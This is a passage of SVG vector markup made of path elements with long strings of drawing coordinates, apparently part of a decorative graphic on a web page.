-1.5-.1-2.6-.2,1.7.7-4,.9.2,1.7h2.3a4,4,0,0,1,.5.1c0,.1.1.1.1.2-1.3.1-1.1-.1-3.7-.1-.7.3,1.8.3,3.9.3.9.7,2.7,1.3-1.4,1.6,4.5.4,2,1.2,7,1.6,0-.3.4-.6.4-.9.8-.1,1.5-.1,2.3-.2h-2.4c-.1-.2-.4-.3-1-.5a16.21,16.21,0,0,0,2.2-.2,8.1,8.1,0,0,0,2.2,0,2.08,2.08,0,0,1,.7.1c0-.2,2.5-.2,5.2-.1,1.2-.5.7-1.1,3-1.8-3.8-.1-1.8.5-6.1.3-.2-.1-.2-.1-.1-.1h.4a5.6,5.6,0,0,0,.7-.2,3.88,3.88,0,0,0,.9-.1h-.7a3.25,3.25,0,0,0-1.3-.3,23.14,23.14,0,0,1,3,.2c.3-.3,3-.8.3-1.1.1.3-1.7.3-2.8.5-7-1.2,7.3-1.1,12-1a11.71,11.71,0,0,1,3.8-.6c4.6.1,1.8.9,6.9.9,1.2-.2-4.4-.4-1.3-.5a12.28,12.28,0,0,0,2.9.2,4.76,4.76,0,0,0,.7.3h-.1c-.1.2.5.3,1.5.3.6.1,1.4.3,2.1.4-.4-.1-.5-.2-.4-.3,2.7.1,6.1.1,6.8.4-.6.1-1.9.5,1.4.6,2.9.1-1.4-.6,2.9-.4,1.8,0,.8.3,2.4.4.7-.3,2.8.2,5.3.1.2-.3-.8-.7,3.8-.7-5.8-.1-3.6-.4-7.5-.2a15.33,15.33,0,0,1,5.1-.2c-1.2-1.1,1.3-1.8-.8-2.7,3.2-.1,4.3-.4,8.1-.4,2.5,0,1.6.3,2.8.5-.4.1-.6.1-.9.2a3.7,3.7,0,0,1,1.1-.1h.5a12.27,12.27,0,0,1,2.1,0,2,2,0,0,1,.9-.2c1.5,0,3.3,0,5.4.2-3.6-.3-2.1-.4-1-.6-1.2.5,4.7.4,5.3,1a16.09,16.09,0,0,0-2.5.1,12.35,12.35,0,0,0-1.7-.3c1.2.5-5.7.7-1.9,1a24.26,24.26,0,0,0,3.3-.2,9.78,9.78,0,0,0,1.3.3c3.1-.3,0-.9,4.7-.9-.3.3-.1.8,3.8,1-.3-.6,3.4-.7,5.6-1,.9.2-5.2,1.5-.9,1.8,1.9-.7,6-.9,12-1,1.3-.3-3.3-.6-.4-.7-.4.5,5.4-.2,1.8-.4.3.3-5.3.1-5.4-.2a45.71,45.71,0,0,0,7.4,0c-.3-.8-1.3-1.4-4.4-1.9.7.3-1.5.4-.1.6.1,0,.1.1.2.1-4.1.2-7.2,0-9.8.4-1-.5-.1-.5-2.6-.8,2.3,0,3.6.4,3.1,0-5-.4-2.8-1,.2-1.3a31.61,31.61,0,0,1-5.2-1.7h1.3a3.54,3.54,0,0,1-1.2-.7,21.48,21.48,0,0,1,3.4-.2c-.1-.2-.7-.3-1.3-.4-1.2-.4-.4.1-2.2.1a.68.68,0,0,1,.5-.4c1.5-.1,2.7-.2,1.3-.3a.87.87,0,0,1-.5-.1,53,53,0,0,1,5.4-1.3c-6.7-.2-4.6.5-9.1.5-.2-.1-.5-.2-.7-.3,1.9-.1,1.8-.3,1.1-.7,4.8.1,5.9-.1,8.2-.1-9.7-.7-4.3-1.6-1.9-2.1a21.47,21.47,0,0,1,3,.3c1.3-.6.9-.9-2.2-1.2.2,0,.3-.1.5-.1,1,.1,2.4.1,3.8.1-1.3.1-2.6.5.9.6-.5-.3,4.1,0,2.9-.4-.3-.1-1.2-.1-2.1-.2a9.89,9.89,0,0,1,2.3.2c.1.6,3.1,1-.2,1.3-2.3-.1-1.1-.3-3.1-.4l.4.4c1.7.1,2.7.1,3.5.1-.4.2-2,.3-4.9.1.3.3,4.8.9,5.5.4-5.2-.3,1.6-.1,2-.2-1.8,0-1.1-.2-1.2-.3a20.13,20.13,0,0,1,2.2.1c-1.5-.4-1.8-.8-1.6-1.1a23.62,23.62,0,0,1,4.2.4c-.2.1-.3.3-.4.4a15,15,0,0,0-2.5.2h2.7c.1,0,.2.1.3.1-.2,0-.2-.1-.3-.1,2.5,0,2.8.2.5.2,5,.1.8.5,4.5.5,2-.5-3.3-.7-.7-1.1,4.8.7,2.1,1.4,10.7,1.9.3.4.2.6-.2.8h-.2a10.52,10.52,0,0,0-2.9,1.5c3.6.1,5.4,0,5.3-.3-3.3-.1-1.8-.4-1.1-.7.8.2.7.6,1.4.7,4.3.2,3-.3,7.3-.1-.6-.2-2.7-.6.4-.6.1.1.3.1.7.2,1.2.5-.8.9,1.6,1.4,1.4-.2,4.1.5,5.7.7a12.27,12.27,0,0,1,2.1,0c.3-.2,2.1-.3,2.8-.5,1.7.5,2.4-.1,5.2,0,1.8.1.1.5,3.5.5.9-.2,3.1-.8-.6-.9-.1.6-7.2-.1-9.7-.4,5.2-.2-.3-1.2,7.6-1.3-1.5-.1-3.3-.2-4.5-.4,1.5-.5,2.8-.8,8.2-.4-.4-.3,1.4-.3,2.9-.4,1.2.2,1.7.9-1.5.8.3.3,2.2.4.4.6,2,.2,4.4.4,6.7.6-1.8.5,2,.6.7,1,1.9,0,3.8.1,5.7.1.4.2-1.8.2-2.6.3,2.1.3,4.1-.1,5.8.2.6.5-.5.3-2.7,0-.7.4,7,.4,6.2.8-9-.3,1.2.6-5.1.5a11.33,11.33,0,0,1,2.6.3v.1c-.1,0-.2.1-.4.1h-1.7c1.8.5-2.8.2-1.8.5a26.2,26.2,0,0,0,2.8.1c1.9.1,2.1,0,2-.1.5,0,1-.1,1.3-.1a6.42,6.42,0,0,1-1.8-.2.3.3,0,0,0,.2-.1c.4,0,.9.1,1.5.1h.1c.7.1,2.3.1,2.7.2,3.5,0,7.9,0,9.5-.2-9.3-.2,1.1-.3-3.4-.7a13.45,13.45,0,0,0,4.2,0c-3.2,0-1.9-.4-4.5-.4-.4.2-.1.5-3.9.3-1.3-.5-1.1-.9,0-1.2a50.79,50.79,0,0,1,7.8.2c-.5-.3.1-.5,2.9-.4.1-.2-1.4-.3-1.4-.5h4.2c.9.4,5.3.5,10,.9a7.88,7.88,0,0,1,2-.1c-3.2-.5,3.2-.4-1.6-.8a73.05,73.05,0,0,1,8.5.2c-1.3.1-1.1.4,1.4.5-.6-.4-1-.8-5-1.2a8.17,8.17,0,0,0,1.3-.2c1.6.1,3.4.1,4.9.2-.2.3,3,.2,2.5.6-.6,0-1.1.1.1.1,0-.1.1-.1,1-.1.3.1.2.2,1.2.2-1-.4,1.6-.3.6-.6-2,0-3.4-.1-4.6-.2,2.2,0,3.8,0,3.4-.2h-4.2c1.5-.2,1.2-.4-.6-.7,4.3.2,2.4-.6,6.2-.2.8-.4-4.8-.2-4.5-.5a7.35,7.35,0,0,0,2.4-.5h.5a8.34,8.34,0,0,1,1.8-.2c1.6,0,3.5,0,3.5-.2a21.47,21.47,0,0,1-3-.3c.4.2.3.3-.4.3a13.35,13.35,0,0,1-2,0h0c.1-.2,0-.5-.4-.7.8,0,1.7.1,2.5.1,5.8.2,10.1.4,8,1-7.2.1-3.4.6-1.7,1.3-1.9,0-3.1-.1-4.3-.2-.3.2-3.5,1.1,2.5,1.3,3.1.1-2.1-.3-.5-.6,4.6.2,1.6-.3,5.4-.2,2.3,1-.5,1.1-7.4,1,.5.7-1,1.1-2.1,1.8-.5.3-.9.6-1,1.1h.9c2.7.1,4.2-.2,4.8.1-2.2.3,1.1.5.9,1a12.82,12.82,0,0,0-4.1,0c5.1.5-4.5.4,3.4.7a34.87,34.87,0,0,1-5,.3h-1.7c.5,0,1.1.1,1.7.1,1.9.1,4.1.2,5.5.3.7.3.2.4-.9.5,2,.2,5.3.2,7.3.4-1.5-.5,2.6-.4,5.2-.4.6-.3-1.6-.4-2-.5.1,0,.2-.1.3-.1,1.8,0,3.6.1,5.4.1,1,.4-3,.4,1.9.6,5.1-.3-10.1-1-4.2-1.6-.6.6,3.8.2,6,.5-1.3-.7,12.9-1.8,13.5-.5,4.8.2,5-.1,5.3-.3-3.6,0-5.1-.2-4.6-.4-2.5-.1-8.2-.1-8.6-.3.9-.3,2.1-.6-2.2-.9,6-1.7.7-3.9,1.8-5.9,1.4.5,1.4.5.8.9,8.2.2,3.8.7,4.9.8,1.1-.3,1.7.4,4.3.1,1.6.9-.8,1.5,6.1,2.2-.5-.9,9.1.5,8.3,0-8.8-.6-7.4-1.3-3-1.8-1.7-.1-4-.1-4.4-.2,4.9-.2,5.3.5,7.7.8a45.25,45.25,0,0,0,4.6-1.1c2.2.1,4.6.3,4.6.5-1.1.4-2.8.2-.7.7-1.9,0-3.1-.1-4.3-.2-.1.3,3.5.4,3.4.7-2.4-.1-4.7-.1-7.1-.2a60.26,60.26,0,0,1,11.1,1.6c2-.7,13.6-1.2,8.1-1.9,2.4,0,8.4-.1,9.8.1-3,.4-4.4.3-.5,1-1.8,0-2.1-.2-4.4-.2.7.9-9.7.2-8.8,1.1,2.5.2,6.1.4,7.6.7.7-.3,6.6.1,7.2.3-2.7.1-3.5.3,1.6.3-3.1.4-.1,1.3-5.7,1.4-3.3-.1-4.3-.3-8.6-.3-4.3-.7-2.4-1.6-3.5-2.4-2.6,0-4.7,0-5.5.1,3.1,0,4.6.2,4.5.4-3.2,0-3.7,0-7.1-.2.5.3.8.5-2.3.5l-.4-.4c-7.1-.2-9.4.6-7.5.9a31.43,31.43,0,0,1,4-.2c.5.2,2.5.2,3.1.4-.8.4-4.8,0-6.8.2,4,.3-3.2,0-2.6.2,2.1.1,4.6.3,4.6.5-2.1,0-5.3-.2-5.6,0,11.8,1.3-6.6,1.6,4.1,3a30.21,30.21,0,0,0-5.2.4c5.3.1,7.7-.1,12.5,0-.7-.5-2.3-1.5,4.1-1.7.5.2,3.7.8-.6.9,2.1.1,5.2.1,5.8.2-2.2,1.1,5.1,2.9.6,3.8.2-.2,6.2.1,6.9-.1-5.9-.5-4.6-1.1.2-1.3-5.2-.8-3.5-2-5.2-2.7,7.9.1,8.8-.8,14.8-.5.6-.3-2.6-.9.5-1,.6.3,4.8.4,6.2.7,1-.2,2.9-.4,2-.8,3.6.1,4.6.3,5.6,0-1.1-.9-3.9-2,4.6-2.7,8.2.3,4,1,6.8,1.5,2.4-.4.1.5,3.2.5,0-.3,8.6-.1,9.9.2-1,.2-3.1.3-8.2.1.4.3.8.6,4.7.7-3.1-.7,7.4.1,6.8-.2-2.1-.1-3.6-.3-4.5-.4,8.3.2.3-.6-2.1-.8,4-.2-6.2-1.7,2.4-2,2,.4,3.5.7,2.2.9,5.9.2,9,.6,10.7,1.1-2.7.2-2.8-.1-5.8-.2.9.3,9.2.9,2.3,1a17.36,17.36,0,0,0-4.6-.5c4.6.7,13.6,1.5,14.3,2.1a52.3,52.3,0,0,0,5.6,0c3.1,1.1,11.6,2.3,3.7,2.6,1.2.4-.9,1,2.5,1.3.9-.4,7.8-.2,6.5-.5,2.2.4,5.5.8,9.3,1.1-4.1,0-.6.8-3.4.9-3.8,0,.5-.5-3.2-.5-8.7.9.3,3.1-7.5,4.1-4.3-.3,3.2-.9-3.8-1.2-3,.3-.9.9-4.3,1.4-5.2,0-6.4-.3-6.2-.7,8.4.2,2.8-1.4,13.3-.7-3.7-.6-4.9-1.3.1-1.5-.8-.2-5.6-.2-4.7-.5a33.79,33.79,0,0,1,4.5.3c-6.7-.7-2.8-2.7-10.1-3.6,2.6,0,4.7,0,5.5-.1-3.4-.1-4.1-.5-7.5-.6,1.9.4-2.7.3-3.8.5,2.1.1,5.3.7,2,.7s-1.9-.4-4.6-.4c-.3.1.2.2-1.2.2a4,4,0,0,0-1.6-.3c0,.5,9.4,1.3,2.7,1.5,1.1-.4-5-.3-6.1-.6,2.9-.4-2.6-1.4-4.2-1.6,2.1.7-7.4.4-9.1.8-2.4-.5,3.7-.1,2.4-.5a97.88,97.88,0,0,0-13.7.2c.7-.3-3.1-.3-4.5-.4-2,.2.6.9-6.6.4-.2.3,2.3.9-2.1.8-3.1-.3-.3-.9-6.5-1,18.3,2.3-19.2,2.2-5.9,4.3-6.7-.3-6.1.1-8.1.3-5.3-.3-9.4-.7-13.5-1.1,2.5-.2-.1-.3-.5-.6,2.2-.3,5.6.2,5.4-.2a52.3,52.3,0,0,0-5.6,0c-1.2-.5.7-.6,1.6-1.4-5-.3-5.1-.6-10.2-.6,2.6.8-2.7,1,4.4,1.8-3.1-.3-14.6,0-6.6.4.1-.2-.9-.4,1-.4,2.1.1,5.2.1,5.8.2-1,.4,5,.9-2.1.7,1.7-.1,1.5-.4-1.8-.5.2.4-2.6-.1-4,.2,4,.4,5.1,1.3,1.3,1.4-1.4,0-2.8-.1-4.3-.1,2.5-.4-10-1-3.3-.6-3.1.7,9.5,1.4,13.9,1.6.9.3-5.2,0-5.4.2,6.5.2,7,.7,10.7,1.1-.8-.2,4.9-.3,5.6,0-2.3.6,1.7,2-3.4,2.4-2.6-.2-4.7-.5-5.7-.1,9.8.3-1.9.9,2.5,1.3,4.9.2,1.4-.4,6.8-.2-.9.5,6.7.5,7.8.9-4.8.3-2.5,1.8.6,2.3,4.7-.1-2.1-.7,3.6-.7,3,.3,8.9.3,11.6.6-1.6.2,1.3.8,3.7,1.1a11.3,11.3,0,0,1,5.6,0c2-.9-3.5-1.5-2.2-2.4a55.5,55.5,0,0,1-5.9-.4c2.4,0-.6-.5,2.4-.5,5,.1,2.3.7,7.7.8.8-.3-5.6-1.4,1.8-1.2-.2-.2-.3-.4-.5-.6-9.9-.2-5.9-1.5,2-.9.9-.5-2.2-1.4,5.9-1.2-2.6.6-1.5,1.2,3,1.8.4-.2,3.9-.1,2.3-.5a19.43,19.43,0,0,1-4.5-.4c3.3,0,.9-.5,3.8-.5a66.19,66.19,0,0,0,6.9-.1c4.6.6-.7,1.1-1.5,1.5,5.6.2.7-.6,5.1-.5,2.3.1,1.1.3,3.1.4,3.1,0-1.4-.8,2-.8,2,.3,1.6.8,6.4.9a56.21,56.21,0,0,1-6.2.8c5-.1,6.4.7,14.8,1-5.7-.7-13-1.6-3-1.8-2.2-.6-3.4-1.5,1.3-1.7a68.57,68.57,0,0,0,7.7.8c5.8-.1-4.8-1-1.1-1.2.3.1.6.3,3,.3.1-.3-3-.4-4.7-.7a50.7,50.7,0,0,1,9.7,0c-4.4,1.2,1.3,2.6-6.4,3.8-3.3-.9,6.9-1.6-3.4-2.3,4.2.6-3.8.6,2.3,1-2,.4-8.3.3-4.8.9-1.6-.4,3.6,0,4.2.1a5.61,5.61,0,0,0-2.1.7c7.5.2,4.3,1.1,12.3,1.4-9-1.3.3-2.2,5.8-2.9-2.4-.4-5.6.1-7.2-.3a31.43,31.43,0,0,1,4-.2c7.3.5,5.3.1,12.4,0,2.9.7-6.4.2-6.4.6,1,.3,7.4.9,5.1,1a26.88,26.88,0,0,1-3.1-.3,17.67,17.67,0,0,0-2.4.4c3.2,0,5.4.1,5.9.4-7-.1-11.7,0-12,.6a41.15,41.15,0,0,1,4.3.1c-2.9.3-2.3.9-5.9,1.2,4.8.3.3.5,3.6,1-6.5-.2,1.2,1-4.8.9,1.1,0,1.7.1,1.6.3,14,.5,3.4-1.4,11.2-1.5-.4.6,3.3.5,4.4.2,7.8,1-10,1.5-1.2,1.8-.2.3-7.2.8-3.5.8,1.9-.5,1.1-.1,7,0,2.9,0-3.7-.8.6-.9,2,.1,1.6.8,3.2.5-1.4-.5-.2-.5-3.5-.8,1.5-.1,5.2-.1,6.8-.2-1.2-.2-6.9-.1-6-.5,15.1.2,5.5-1.5,12.2-1.9,5.5,1.7,2,3,3.6,4.1a9.07,9.07,0,0,1,2.8.1l.3.3c-3.3-.1-5.4-.1-7,0,3.6.5-2.9.4-3.5.8,4,.9,2.2,3-1,3.6-.2.5,3.4,2.5-5.9,2.8,2.1.1,5.2.1,5.8.2a31.08,31.08,0,0,0-5.1,2.1c1.9.1,5.4,0,5.8.2-1.2.2-5.1.1-6.7.3,9.3.8-4.7,1.1,1.8,2,6.9,0,1.8-.4-.4-.4a3.93,3.93,0,0,1,2.3-.5c.2.5,2.2,0,4.3.1,1.8.2,1.9.3.4.4,11.2.3.2-1.1,0-1.6s10.4,0,9.1-.7a35.62,35.62,0,0,0-4,.1c-2.2-.5-5.6-1.2.1-1.4,1.2.4,6,.2,5.5-.1-3.5-.3-1.7-.4-5-.9,6.9.5.7-.6,8.3,0-.5-.6-4.2-.3-6.2-.7,5.6-.2-1.1,0-1.8-.5,2.8,0,2.5-.3,5.6,0,.6-.6-4-1.1-1.3-1.4-2-.2-4.4-.3-6-.5,1.5-.4,2.9-.8,1.5-1.5,10.8.3,8.9-1.4,16.6-1.7-1.7-.1-4-.1-4.4-.2.2-.3,8.2,0,3.8-.5-4.9-.2-1.4.4-6.8.2-1.9-.6-6.4-1.7-3.4-2.3-1.4.3,5.5.7,6.1.6-2.4-.3-6-.6-6.5-1,1.9.2,5.3.2,7.3.4,1.4-.6-2.8-1.3-1.5-1.7,1.6.1,2.3.2,3,.3,2,.8-3.9,1.9,3.6,2.5-2.8-.8,3.8-1.7-1.1-2.8,7.9.2-4.54-1.69,4.66-1.79-7-1.1-4-2.51.24-3.41V0Z\"></path>\n <path d=\"M1739.6,46.7c-1.3-.4.4-.6,2.1-.7-4.5-.2-8.8-.4-11.7-.7A94.06,94.06,0,0,1,1739.6,46.7Z\"></path>\n <path d=\"M1838.7,75.8c3.8-.5,1.4-.8,4.5-1.2-4.6,0-5.9,1-7.6,1.1C1836.6,75.8,1837.7,75.8,1838.7,75.8Z\"></path>\n <path d=\"M1862.2,72.5c-2.3.1-8.6.3-5,.7C1856,72.7,1864.7,73.1,1862.2,72.5Z\"></path>\n <path d=\"M1718.3,65.2c1.8.6.3.8,1.4,1.6,3,.2,7.5.6,7,0-1.6-.1-5.3-.3-6.2-.7,3.6-.3,3-1.2,1.2-1.8-2.2.2.3.1.4.4H1718c-3-.5-4.1-1.1-8.5-1.7-.1-.6,7.4-.1,7.6-.8-8.7-.3-7.1-.8-6.9-1.5,1.4,0,2.9.1,4.3.1-4-.5,1.6-.6-5.4-1.3h4.2c4,.3,7,2.2.1,1.7,5.1.9,9.1,1.5,4.8,2.3,2.5,0,5,.4,5.7.1-2.5-.5-3.2-1.1.1-1.4-7.8-.4-5-1.3.1-1.4,0,.3.2.5,3.3.6,4.2-.5,5.8-.7-1.3-1.4-1,.3,5,.9.9,1-2.1-.1-3.6-.3-4.5-.4,3.2-.2,1.8-.3.7-.7,6.2.2,3.5-.3,6.6-.4-3.1-.3-5.9.1-7.3-.4,1.3-.4-3.9-.9,1.8-1.2,2.3.2,2.9.5,6.2.7.4-.4-5.3-.4-4.9-.8,3.8.1,3.5-.2,3.9-.3-5.2-.7-1.8-1.5-8.8-2.2,2.6-.1,1.5-.5,3.6-.6-.2.2.7.4,3.2.5-5.6-.8,1.1-1.6-8.4-1.7-1-.5,7.9-.5,3.3-1-.3.1.1.2-1.2.2.1-.2-1.8-.3-1.8-.5,6.1,0-2.4-1.2,4.4-1.3-5.8,0-3-.5-6.2-.7-2.9.6-4.4,1.4-6.6,2-3.2-.8-2.7-1.2-3.2-2,2.4,0,6.1.8,5.8.2-9.1-.6.1-1.1-5.7-1.8-1.1.4.3,1.1-5,1.1h-2.4c1.2,0,2,.1,2.4.1.7.1.5.1,0,.1-1,.1-3.4.2-3.4.3,1.6.1,2.7.1,3.4.2,3,.3-.8.9,2.3,1.4h-2.3c-1.8,0-1.2.2,0,.4l1.6.3a7.82,7.82,0,0,1-1.6-.1c-4.9-.1-3,.4-6.4.4a35.32,35.32,0,0,1,6.4.7c1.3.3,1,.5,0,.8-1.7.4-5.2.7-6.7.9,1,0,4.1.3,5.5.4-.2.3-10,.1-5.1.5,1.4-.1.1-.4,3.9-.2.5.4,1.4.8-2,.8a32.58,32.58,0,0,1,4.3.4c.2,0,.4.1.4.2s-.2.1-.4.1a23.8,23.8,0,0,1-4.3.3c1.2.1-1.7.7,1.3.5,1.1-.1,2.1-.2,3-.2,4.4,0,4.4,1.6-.1,2.1a29.32,29.32,0,0,1-5.3.1c.8.2,3.7.4,5.3.5a3.78,3.78,0,0,1,1,.2,3.07,3.07,0,0,0-1,.1,44.23,44.23,0,0,1-6.9.5c.5.6,5,1.1-.2,1.3a54.5,54.5,0,0,0,7,0h0c1.7.3,4.7.7.6.8-.2,0-.4-.1-.7-.1a22.83,22.83,0,0,0-6.6-.3c3.7.3.7,1.2-.3,1.2,1.5.3,4.4.1,6.9.2h.2c.9.3,4.1.5,6.3.8-1.3.1-2,.3-3.9.4-1-.1-1.8-.2-2.6-.3-1.1-.2-2.1-.3-3.7-.5,3.1.5-2.2.5.9,1,1.1.1,2,.1,2.8.1a10.84,10.84,0,0,1,2.9.1c-.6.5-3.9.5-2,.9,1.9,0,3.8.1,5.7.1.5-.5,0-.7.4-1.1,2.1,0,5.3.2,5.6,0C1711,66,1709.7,65.1,1718.3,65.2Z\"></path>\n <path d=\"M1860.5,67.3c4.2,0,1.8-.7,4.8-.9,8.1.5,10.1,1.7,1.6,1.8-1.4-.3,1.7-.2.9-.5-4.9,0-5.7,1.1,1.2,1.3-.8-.8,6.3-.8,10.1-1.2-1.7-.1-4-.1-4.4-.2,7.2.2.4-.4,5.2-.4-2,.2,5.1.4,4.3.2-3.4-.1-3.5-.4-6-.6,1.2.3-2.7.1-4,.2.2-.2-2.1-.3-3.1-.4,5.3-.1,7.5,0,9.4-.3-4.6-.2-4.2.1-7.1-.2,1.9.5-4.6.2-5.2.4l-.3-.3c-1.9,0-3.8-.1-5.7-.1C1864.6,66.8,1858.1,67.1,1860.5,67.3Z\"></path>\n <path d=\"M1873,68.9c2.9-.1,4.8-.3,6.5-.5C1873.4,68.2,1871.4,68.8,1873,68.9Z\"></path>\n <path d=\"M1728.4,62.5c-7,.2,5,1.2,0,1.5-4.8-.2,3.4-.3-3.1-.4,1,.2-1.1.6,2,.7C1737.4,64.2,1726.8,63,1728.4,62.5Z\"></path>\n <path d=\"M1744.4,63.3c-1.8,0-7.3,1.1-1.9,1C1739.6,64.1,1745.3,63.7,1744.4,63.3Z\"></path>\n <path d=\"M1778.9,63c.4.5-8.9,2.1,1.6,1.8C1782.1,64.2,1783.4,63.8,1778.9,63Z\"></path>\n <path d=\"M1774.7,62.9c-.4-.4-5.4-.5-7.7-.8C1762.9,61.6,1769.6,62.9,1774.7,62.9Z\"></path>\n <path d=\"M1855.3,63.1c8,.1.4-1.1-2.6-1.4-.6.2-6.7.7-3.7.6,2.4,0,2-.4,5.3-.3C1852.1,62.4,1857.9,62.7,1855.3,63.1Z\"></path>\n <path d=\"M1816.5,60c4.4.2,2.5-.2,6.9-.1l-.3-.3C1819.3,59.6,1819.2,59.9,1816.5,60Z\"></path>\n <path d=\"M1840.9,48.4C1849.2,48,1837,46.9,1840.9,48.4Z\"></path>\n <path d=\"M1814.7,45.4c-.9.6,2.7,1.4,6.9,1.6C1817.5,46.5,1819.8,45.7,1814.7,45.4Z\"></path>\n <path d=\"M1737.3,44.2c4.1,0,4.3,0,8.5.2,1.6-.5-8.2-.3-7.6-.7.8,0,1.5-.1-.1-.1C1733.3,43.7,1739.7,43.9,1737.3,44.2Z\"></path>\n <path d=\"M1750.7,43.6c-4.4-.2-5.1,0-8.4-.1.4-.2,2.7-.5-2-.7-1.8.1-.4.5-2.2.6,6,0,3.4.5,8.8.5C1744.4,43.5,1753.1,44.1,1750.7,43.6Z\"></path>\n <path d=\"M1780.6,44.5c3.5-.1,2.2-.8.6-.9a15.43,15.43,0,0,1-2.8-.1C1782.1,44,1777,44.2,1780.6,44.5Z\"></path>\n <path d=\"M1707,96.5c-4.4-.2-2.5.2-6.9.1-1.5-.4,1.7-.4.7-.7-.6-.1-6-.6-7.2-.3,4.8.3.4.7.9,1a32.42,32.42,0,0,1,4.4.3C1699,96.5,1709.4,97.3,1707,96.5Z\"></path>\n <path d=\"M686.9,114.8c-2.8.2.1.2.4.4C688.4,116.2,691.2,115,686.9,114.8Z\"></path>\n <path d=\"M528.3,98.8c-3.3-.1-5.4-.1-7,0,.3.1,0,.3,1.7.4C522,98.7,530,99.2,528.3,98.8Z\"></path>\n <path d=\"M731.3,102.1c.1.2,1.4.3,3.2.4-1.4-.4,5.6,0,3.8-.5C733.7,101.9,735.7,102.3,731.3,102.1Z\"></path>\n <path d=\"M637.4,96.4c1.8,0,2.1.2,4.4.2-.6-.2,1.7-.2,2.5-.3A37,37,0,0,0,637.4,96.4Z\"></path>\n <path d=\"M575.1,93.5c3.6-.1,3.2-.7-2.2-.9C574.5,92.9,571.4,93.2,575.1,93.5Z\"></path>\n <path d=\"M530.4,91.7a26.2,26.2,0,0,1-2.8-.1c-.9,0-1.6,0-1.3.1,4.7.1-3.8.4,3.2.5C528.1,91.9,531.2,92,530.4,91.7Z\"></path>\n <path d=\"M518.1,90.3c0,.1.5.8,1.8.5-2.4-.5,8.7-.2,2.1-.7C522.5,90.4,521.2,90.4,518.1,90.3Z\"></path>\n <path d=\"M529.3,87.2c.1.1.3.1,1.5.1l-.4-.4c-2.7,0-6.1-.1-5.4.2A41.09,41.09,0,0,1,529.3,87.2Z\"></path>\n <path d=\"M661.7,87.7c1,.3,1.7.6,6.2.7C667.9,88,665.7,87.8,661.7,87.7Z\"></path>\n <path d=\"M593.9,80.2c-5.8-.1,1.1-.3-4.5-.4.4.4,1.3.7,3.6,1C592.2,80.4,595.4,80.5,593.9,80.2Z\"></path>\n <path d=\"M525,77.6c-1.6.1-5.2.1-7,0C517.4,78.2,529.5,77.9,525,77.6Z\"></path>\n <path d=\"M745.9,79.3c-.5.2-2.8.6,2.1.8C747,79.9,749.2,79.4,745.9,79.3Z\"></path>\n <path d=\"M661,77.4c-1.2-.3-1.2-.7-3.6-1C655.2,76.6,656.4,77.3,661,77.4Z\"></path>\n <path d=\"M660.4,73.6c2.5-.3,3.6.5,5.7.1-4.9-.6-.6-1.7-4.4-1.8-2.1,1.4-12.4,3.2-5.6,4.7C662.2,75.9,668.4,75,660.4,73.6Z\"></path>\n <path d=\"M636.6,73.4c-6.1-.2-4.3.5.5.6C636.9,73.7,636.7,73.6,636.6,73.4Z\"></path>\n <path d=\"M601.8,71.7c1.4,0,2.8.1,4.3.1l-.4-.4C601.9,71.2,602.2,71.5,601.8,71.7Z\"></path>\n <path d=\"M749.9,68.1c-5.8-.1-3.6.5-.7.7C749,68.5,748.1,68.2,749.9,68.1Z\"></path>\n <path d=\"M593.6,64c-.9-.2,1.2-.5-1.9-.6.5.2-.8.3-4,.2.9.2-1.2.5,1.9.6C588.6,63.9,590.9,63.7,593.6,64Z\"></path>\n <path d=\"M610.1,62.3c-1.6-.4-1.6-.4-.6-.7a23.82,23.82,0,0,1-2.8-.1c-.9,0-1.7,0-1.3.1,4.1.2.6.5-.9.5C608.3,62.2,607.5,62.4,610.1,62.3Z\"></path>\n <path d=\"M749.3,64.2c-.2-.4-.8-.8-3.7-1.1C747,63.7,745.2,64,749.3,64.2Z\"></path>\n <path d=\"M597.7,57.7c-.4.2-2.8.2-2.4.5C598.9,58.2,602.8,57.8,597.7,57.7Z\"></path>\n <path d=\"M601.8,57.5c-5.3-.5,2.2-.4-3.4-.7-1.4.2-1.3.5-2.1.7C598.9,57.6,599.2,57.5,601.8,57.5Z\"></path>\n <path d=\"M748.1,59.7c-2.1.3,1.2.5.9,1C751.3,60.7,750.6,59.9,748.1,59.7Z\"></path>\n <path d=\"M599.7,56.7c1.8-.1,1.9-.6-2-.7C598.6,56.2,596.5,56.6,599.7,56.7Z\"></path>\n <path d=\"M727.2,56.4c-3.8-.1-4.5,0-3.9.3,2,0,3.2.1,4.4.2C727.3,56.7,724.7,56.6,727.2,56.4Z\"></path>\n <path d=\"M737.8,55.9c1.9,0,3.2.1,4.4.2,0-.3-.9-.6-3.4-.7C739.4,55.6,738.9,55.8,737.8,55.9Z\"></path>\n <path d=\"M869.9,52.8c1.3.4-2.2.3-.8.6,3.3.1,5.4.1,7,0C876.1,53.1,873.9,52.9,869.9,52.8Z\"></path>\n <path d=\"M626,40.8c-3.5-.1-4.8.4-2.3.5C625.1,41.2,627.5,41.2,626,40.8Z\"></path>\n <path d=\"M647.7,38.7c-3.6.1-2.1.7,2.2.9C647.5,39.2,649.9,38.9,647.7,38.7Z\"></path>\n <path d=\"M639,35.1a4,4,0,0,0-1.6-.3c.2.2.3.4.5.6,3.7.2,6-.2,2.4-.4C640.3,35.1,640.2,35.2,639,35.1Z\"></path>\n <path d=\"M755.1,31.3c-2.7,0-3.2-.2-5.8-.2,5.2.7-5.5,1,1.3,1.4C753,32.2,750.2,31.4,755.1,31.3Z\"></path>\n <path d=\"M688.7,25.2a10.17,10.17,0,0,1-2.7,0c-.3-.1,0-.3-1.7-.4,1.2.5.4,1,4.9.9C683.7,25.5,694.9,25.5,688.7,25.2Z\"></path>\n <path d=\"M706.2,19.9a26.2,26.2,0,0,1-2.8-.1c-.4-.2.1-.4-1.8-.5-.4.2-2.8.2-2.3.5C702.5,20,705.5,20.3,706.2,19.9Z\"></path>\n <path d=\"M739.6,13.7c1-.1,1.7-.2,1.7-.4,1.1.4,3.7.8,5,1.2-.5-.4-3-.9-5.5-1.5a.08.08,0,0,1,.1.08v0a34.18,34.18,0,0,0-3.5-.3C738.5,13.1,736.3,13.5,739.6,13.7Z\"></path>\n <path 